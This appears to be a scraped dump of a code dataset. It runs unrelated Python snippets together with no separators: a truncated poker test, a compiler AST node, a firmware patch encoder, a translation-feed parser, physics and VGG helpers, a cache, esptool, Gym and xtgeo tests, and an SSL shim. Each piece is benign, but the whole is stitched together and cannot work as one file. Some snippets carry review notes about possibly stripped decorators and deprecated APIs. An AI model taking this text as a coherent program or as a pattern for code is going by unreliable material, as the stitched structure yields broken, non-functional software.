    for player_i in range((n_players - 1)):
        assert (state.current_player.name == f'player_{player_i}')
        assert (len(state.legal_actions) == 3)
        assert (state.betting_stage == 'flop')
        state = state.apply_action(action_str='fold')
    # Everyone but one player folded, so the hand ends.
    assert state.is_terminal, 'state was not terminal'
    assert (state.betting_stage == 'terminal')
class FunctionCall(Expression, TupleMixin):
    """AST node for a function call in an attribute-grammar style compiler.

    Classifies each call (conversion / constructor / builtin / new / jump)
    and builds its control-flow graph accordingly.
    NOTE(review): methods sharing names with the synthesized() attributes
    above them suggest stripped attribute-definition decorators — confirm
    against the original source.
    """

    expression: Expression
    arguments: List[Expression]
    names: List[str]
    is_local = synthesized()
    call_type = synthesized()
    call_info = synthesized()

    def call_info(self, arguments: {Expression.expression_value, Expression.cfg}):
        # Bundle argument values and CFGs for consumers (builtins, jumps).
        argument_values = [a.expression_value for a in arguments]
        argument_cfgs = [a.cfg for a in arguments]
        return FunctionCallInfo(self, argument_values, argument_cfgs, self.result_arity)

    def is_local(self, expression):
        # Internal (same-contract) functions have this type identifier prefix.
        return expression.type_descriptions['typeIdentifier'].startswith('t_function_internal')

    def call_type(self, expression: {Expression.expression_value}):
        # Classification cascade; 'jump' (a plain function call) is the default.
        return ('conversion' if (self.kind == 'typeConversion') else ('constructor' if (self.kind == 'structConstructorCall') else ('builtin' if isinstance(expression.expression_value, CallableImpl) else ('new' if isinstance(expression, NewExpression) else 'jump'))))

    def expression_value(self):
        # Single-valued calls expose their one value; tuple-valued calls must
        # be accessed through flattened_expression_values.
        if (self.result_arity == 1):
            return self.flattened_expression_values[0]
        return UndefinedAttribute('expression_value is not applicable for FunctionCalls with tuple-typed return values. Please use flattened_expression_values instead.')

    def flattened_expression_values(self, expression, arguments: {TupleMixin.flattened_expression_values, Expression.expression_value}):
        if (self.call_type == 'conversion'):
            # A conversion passes its single argument's value(s) through.
            assert (len(arguments) == 1)
            return as_array((arguments[0].flattened_expression_values if isinstance(arguments[0], TupleMixin) else arguments[0].expression_value))
        if (self.call_type == 'constructor'):
            return [ir.Const(self, 'New Struct')]
        if (self.call_type == 'new'):
            return [expression.expression_value]
        if (self.call_type == 'builtin'):
            # Builtins compute their own result values once set up.
            builtin: CallableImpl = expression.expression_value
            builtin.setup(self.call_info)
            return builtin.flattened_expression_values
        # Jump calls: one placeholder argument per returned value.
        return [ir.Argument(self) for _ in range(self.result_arity)]

    def cfg(self, expression: {MemberAccess.base_expression_value, MemberAccess.base_expression_cfg}, arguments: {Expression.expression_value, Expression.cfg}):
        # Start with the argument-evaluation CFGs, in order.
        cfg = CfgSimple.concatenate(*map(__.cfg, arguments))
        if (self.call_type == 'conversion'):
            pass
        elif (self.call_type == 'constructor'):
            cfg >>= expression.cfg
            cfg >>= self.flattened_expression_values[0]
        elif (self.call_type == 'new'):
            cfg >>= expression.cfg
            cfg >>= self.flattened_expression_values[0]
        elif (self.call_type == 'builtin'):
            builtin: CallableImpl = expression.expression_value
            builtin.setup(self.call_info)
            cfg >>= builtin.cfg
        elif (self.call_type == 'jump'):
            # Only internal calls can be compiled as jumps.
            assert self.is_local
            # Continuation block receives the call's return values.
            cont = ir.Block(self, self.flattened_expression_values, info='CONTINUATION')
            arg_values = [arg.expression_value for arg in arguments]
            (pre, transfer, continuation) = self.cfg_jump(expression, cont, arg_values)
            cfg >>= (pre >> CfgSimple.statements(transfer, continuation))
        else:
            raise NotImplementedError()
        return cfg

    def cfg_jump(self, expression, cont, arg_values):
        """Build the jump transfer for a local call; returns (pre, transfer, cont)."""
        if isinstance(expression, MemberAccess):
            base = expression.expression
            if (isinstance(base, Identifier) and (base.name == 'this')):
                # this.f() jumps to the contract's own function f.
                dest = ir.JumpDestination(expression, expression.expression.name)
            else:
                dest = ir.JumpDestination(expression, expression.member_name)
        elif isinstance(expression, Identifier):
            if isinstance(expression.resolve(), FunctionDefinition):
                dest = ir.JumpDestination(expression, expression.name)
            else:
                # Calls through function-typed variables are unsupported.
                raise CfgCompilationNotSupportedError('Function variables not yet supported')
        else:
            raise NotImplementedError('Function call to unexpected element', expression)
        transfer = ir.Jump(self, dest, cont, arg_values, self.names)
        return (CfgSimple.empty(), transfer, cont)
def encode(ffrom, fto, data_segment):
    """Build a binary patch transforming `ffrom` into `fto` for one segment.

    Disassembles both files over the segment's offsets, builds three patch
    blocks (data pointers, code pointers, call0) and concatenates the two
    pointer headers, the per-block headers, and the per-block payloads.
    Returns the (in-memory) source streams and the patch bytes.
    """
    ffrom = BytesIO(file_read(ffrom))
    fto = BytesIO(file_read(fto))
    (from_call0, from_data_pointers, from_code_pointers) = disassemble(ffrom, data_segment.from_data_offset_begin, data_segment.from_data_offset_end, data_segment.from_data_begin, data_segment.from_data_end, data_segment.from_code_begin, data_segment.from_code_end)
    (to_call0, to_data_pointers, to_code_pointers) = disassemble(fto, data_segment.to_data_offset_begin, data_segment.to_data_offset_end, data_segment.to_data_begin, data_segment.to_data_end, data_segment.to_code_begin, data_segment.to_code_end)
    (data_pointers_header, data_pointers) = create_data_pointers_patch_block(ffrom, fto, data_segment.from_data_offset_begin, data_segment.from_data_begin, data_segment.from_data_end, from_data_pointers, to_data_pointers)
    (code_pointers_header, code_pointers) = create_code_pointers_patch_block(ffrom, fto, data_segment.from_code_begin, data_segment.from_code_end, from_code_pointers, to_code_pointers)
    call0 = create_patch_block(ffrom, fto, from_call0, to_call0, overwrite_size=3)
    # Each patch block appears to be a (header, data) pair; zip transposes
    # the three pairs into all-headers and all-datas.
    # NOTE(review): confirm the pair structure against the *_patch_block helpers.
    (headers, datas) = zip(data_pointers, code_pointers, call0)
    patch = b''.join((([data_pointers_header, code_pointers_header] + list(headers)) + list(datas)))
    return (ffrom, fto, patch)
def extractTheSunIsColdTranslations(item):
    """Map a 'The Sun Is Cold' feed item to a release message, if any.

    Returns None for previews/non-chapter items, a release message for a
    recognised series tag, and False otherwise.
    """
    (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
    if ('preview' in item['title'].lower()) or not (chp or vol):
        return None
    # Known series tags mapped to canonical series names (checked in order).
    series_by_tag = {
        '108 maidens': '108 Maidens of Destiny',
        'Back to the Apocalypse': 'Back to the Apocalypse',
    }
    for (tag, series) in series_by_tag.items():
        if (tag in item['tags']):
            return buildReleaseMessageWithType(item, series, vol, chp, frag=frag, postfix=postfix)
    return False
def render_contacts(pb_client, model, scale_h=0.0005, scale_r=0.01, color=None):
    """Draw an arrow for every contact point reported for `model`.

    :param scale_h: arrow length per unit of normal force.
    :param scale_r: arrow thickness.
    :param color: RGBA list; defaults to translucent red.
    """
    # Fix: the mutable list default argument was shared across all calls;
    # use a None sentinel instead (behaviour unchanged for existing callers).
    if color is None:
        color = [1.0, 0.1, 0.0, 0.5]
    data = pb_client.getContactPoints(model)
    for d in data:
        # Per pybullet docs: d[6] = position on B, d[7] = contact normal
        # on B, d[9] = normal force magnitude.
        (p, n, l) = (np.array(d[6]), np.array(d[7]), d[9])
        p1 = p
        p2 = (p + ((n * l) * scale_h))
        gl_render.render_arrow(p1, p2, D=scale_r, color=color)
class VGG(object):
    """Minimal VGG feature extractor built from pretrained weights."""

    def __init__(self, weights_path, layers=VGG19_LAYERS):
        # Weights are consumed in order by the conv layers during forward().
        self.weights = load_vgg_weights(weights_path)
        self.layers = layers

    def forward(self, image):
        """Run `image` through the configured layers.

        Returns a dict mapping each layer name to its output tensor.
        """
        activations = {}
        weight_idx = 0
        tensor = image
        for layer_name in self.layers:
            # The first four characters encode the layer kind.
            kind = layer_name[:4]
            if (kind == 'conv'):
                (kernel, bias) = self.weights[weight_idx]
                weight_idx += 1
                tensor = conv_layer(tensor, kernel, bias)
            elif (kind == 'relu'):
                tensor = tf.nn.relu(tensor)
            elif (kind == 'pool'):
                tensor = pool_layer(tensor)
            activations[layer_name] = tensor
        # Every configured layer must have produced an activation.
        assert (len(activations) == len(self.layers))
        return activations
def put(domain: str, key: str, value: str) -> None:
    """Upsert (domain, key) -> value into the cache table and trim old rows.

    An UPDATE is tried first; the INSERT fires only when the UPDATE changed
    nothing (the Changes() = 0 guard), giving upsert semantics without
    requiring ON CONFLICT support.
    """
    conn = _db_conn()
    conn.execute('UPDATE ghstack_cache SET value = ? WHERE domain = ? AND key = ?', (value, domain, key))
    c = conn.execute('\n INSERT INTO ghstack_cache (domain, key, value)\n SELECT ?, ?, ? WHERE (SELECT Changes() = 0)\n ', (domain, key, value))
    # Evict the oldest entries so the table stays bounded near CACHE_SIZE rows.
    if (c.lastrowid is not None):
        conn.execute('DELETE FROM ghstack_cache WHERE id < ?', ((c.lastrowid - CACHE_SIZE),))
    conn.commit()
def read_mac(esp, args):
    """Print the chip's MAC address(es), preferring the EUI64 form."""
    def show(label, mac):
        formatted = ':'.join((('%02x' % octet) for octet in mac))
        print(('%s: %s' % (label, formatted)))
    eui64 = esp.read_mac('EUI64')
    if not eui64:
        # Chip without EUI64 support: the base MAC is the only MAC.
        show('MAC', esp.read_mac('BASE_MAC'))
        return
    show('MAC', eui64)
    show('BASE MAC', esp.read_mac('BASE_MAC'))
    show('MAC_EXT', esp.read_mac('MAC_EXT'))
class TrafficMatrixSequence(object):
    """An ordered, list-like sequence of traffic matrices.

    Optionally records the time interval between consecutive matrices in
    the `attrib` dict (keys 'interval' and 't_unit').
    """

    def __init__(self, interval=None, t_unit='min'):
        """
        :param interval: spacing between matrices (None = unspecified).
        :param t_unit: unit for interval; must appear in the module-level
            time_units when interval is given.
        :raises ValueError: if t_unit is not a recognized time unit.
        """
        self.attrib = {}
        if (interval is not None):
            if (not (t_unit in time_units)):
                raise ValueError('The t_unit argument is not valid')
            self.attrib['interval'] = interval
            self.attrib['t_unit'] = t_unit
        self.matrix = []

    def __iter__(self):
        return iter(self.matrix)

    def __len__(self):
        return len(self.matrix)

    def __getitem__(self, key):
        return self.matrix[key]

    def __setitem__(self, key, value):
        self.matrix[key] = value

    def __delitem__(self, key):
        del self.matrix[key]

    def insert(self, i, tm):
        """Insert matrix `tm` at position `i`."""
        self.matrix.insert(i, tm)

    def append(self, tm):
        """Append matrix `tm` to the end of the sequence."""
        self.matrix.append(tm)

    def get(self, i):
        """Return the matrix at position `i`."""
        return self.matrix[i]

    def pop(self, i):
        """Remove and return the matrix at position `i`.

        Fix: the popped matrix was previously discarded; follow the
        list.pop convention and return it (backward-compatible — callers
        that ignore the return value are unaffected).
        """
        return self.matrix.pop(i)
def test_act_serialization():
    """An ACT GymMessage survives an Envelope encode/decode round trip."""
    msg = GymMessage(message_id=1, dialogue_reference=(str(0), ''), target=0, performative=GymMessage.Performative.ACT, action=GymMessage.AnyObject('some_action'), step_id=1)
    msg.to = 'receiver'
    envelope = Envelope(to=msg.to, sender='sender', message=msg)
    envelope_bytes = envelope.encode()
    actual_envelope = Envelope.decode(envelope_bytes)
    expected_envelope = envelope
    assert (expected_envelope.to == actual_envelope.to)
    assert (expected_envelope.sender == actual_envelope.sender)
    assert (expected_envelope.protocol_specification_id == actual_envelope.protocol_specification_id)
    # Intentional inequality: the decoded envelope still carries the
    # serialized form of the message, not the Message object — presumably;
    # the explicit decode below recovers the comparable message.
    assert (expected_envelope.message != actual_envelope.message)
    actual_msg = GymMessage.serializer.decode(actual_envelope.message)
    # to/sender are transport metadata, restored from the envelope.
    actual_msg.to = actual_envelope.to
    actual_msg.sender = actual_envelope.sender
    expected_msg = msg
    assert (expected_msg == actual_msg)
def test_well_gridprops_zone(loadwell1):
    """Sampling the grid Zone property onto a well adds a discrete log with
    the expected zone-name records."""
    grid = xtgeo.grid_from_file('../xtgeo-testdata/3dgrids/reek/reek_sim_grid.roff')
    gridzones = xtgeo.gridproperty_from_file('../xtgeo-testdata/3dgrids/reek/reek_sim_zone.roff', grid=grid)
    gridzones.name = 'Zone'
    well = loadwell1
    # Sample the grid property along the well trajectory.
    well.get_gridproperties(gridzones, grid)
    well.zonelogname = 'Zone_model'
    assert (well.get_logrecord(well.zonelogname) == {1: 'Below_Top_reek', 2: 'Below_Mid_reek', 3: 'Below_Low_reek'})
def query_exchange(in_domain: str, out_domain: str, session: Session, target_datetime: (datetime | None)=None) -> (str | None):
    """Fetch cross-border physical flows (ENTSO-E document type A11) between
    two bidding domains; returns the raw response text or None."""
    query_params = {
        'documentType': 'A11',
        'in_Domain': in_domain,
        'out_Domain': out_domain,
    }
    return query_ENTSOE(session, query_params, target_datetime=target_datetime, function_name=query_exchange.__name__)
class _SSLContext(object):
    """Minimal SSLContext stand-in for runtimes lacking ssl.SSLContext.

    NOTE(review): ssl.wrap_socket was deprecated in Python 3.7 and removed
    in 3.12; this shim only works on older runtimes — confirm intended scope.
    """

    def __init__(self, protocol):
        # SSL/TLS protocol version constant, passed as ssl_version later.
        self._protocol = protocol
        self._certfile = None
        self._keyfile = None
        self._password = None

    def load_cert_chain(self, certfile, keyfile=None, password=None):
        """Mirror ssl.SSLContext.load_cert_chain; the key defaults to the
        certificate file when not given separately."""
        self._certfile = certfile
        self._keyfile = (keyfile or certfile)
        self._password = password

    def wrap_socket(self, sock, **kwargs):
        """Wrap `sock` with the stored certificate/key and protocol."""
        # On Python 2, ssl.wrap_socket requires a real socket.socket instance.
        if (PY2 and (not isinstance(sock, socket.socket))):
            sock = socket.socket(sock.family, sock.type, sock.proto, sock)
        return ssl.wrap_socket(sock, keyfile=self._keyfile, certfile=self._certfile, ssl_version=self._protocol, **kwargs)
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.